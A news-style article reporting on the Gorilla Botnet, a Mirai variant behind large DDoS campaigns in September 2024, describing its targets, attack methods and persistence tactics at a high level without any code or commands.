The Gorilla Botnet, a newly discovered cyber threat, has been making waves in the cybersecurity world with its unprecedented activity. Between September 4 and 27, the botnet launched over 300,000 DDoS attacks targeting victims in more than 100 countries. This level of aggression and scope of attacks have raised alarm bells among security experts globally.
This sophisticated botnet, which is a modified version of the infamous Mirai malware, has evolved to support multiple CPU architectures. It utilizes advanced techniques to maintain control over infected devices for extended periods. One of its key features is the use of encryption algorithms commonly associated with the KekSec hacker group. This demonstrates a high level of sophistication and a strong ability to avoid detection.
The targets of the Gorilla Botnet have primarily been critical infrastructure sectors such as universities, government websites, telecoms, and banks. These sectors play a crucial role in a country’s functioning, and any disruption to their operations can have far-reaching consequences. The sheer scale and precision of these attacks highlight the botnet’s potential to cause significant disruptions and damage.
In a significant campaign in September 2024, the Gorilla Botnet unleashed over 300,000 attack commands daily, targeting victims across 113 countries. Its preferred method of attack was the UDP Flood, a technique that exploits the connectionless nature of the UDP protocol to flood victims with traffic. Countries like China, the United States, Canada, and Germany were hit particularly hard by these attacks, underscoring the global nature of the threat.
The GorillaBot trojan, a variant of the Mirai family, boasts a wide array of DDoS attack methods, including UDP, TCP, GRE, and specialized attacks targeting specific protocols like OpenVPN, Discord, and FiveM. The botnet’s use of encryption algorithms favored by the KekSec group raises suspicions of a potential connection between the two. The presence of certain code signatures further fuels speculation about the botnet’s origin and motives.
To ensure its persistence, the Gorilla Botnet exploits vulnerabilities in systems like Hadoop YARN RPC, granting it high privileges. It deploys various tactics to evade detection, including creating a service file for automatic startup and downloading malicious scripts at system boot or user login. The botnet is also adept at identifying and avoiding honeypots, adding another layer of complexity to the threat it poses.
Overall, the emergence of the Gorilla Botnet represents a significant challenge for cybersecurity professionals worldwide. Its advanced capabilities, global reach, and potential connections to known hacker groups make it a formidable adversary. As security experts work tirelessly to analyze and mitigate this threat, the need for robust cybersecurity measures has never been more critical.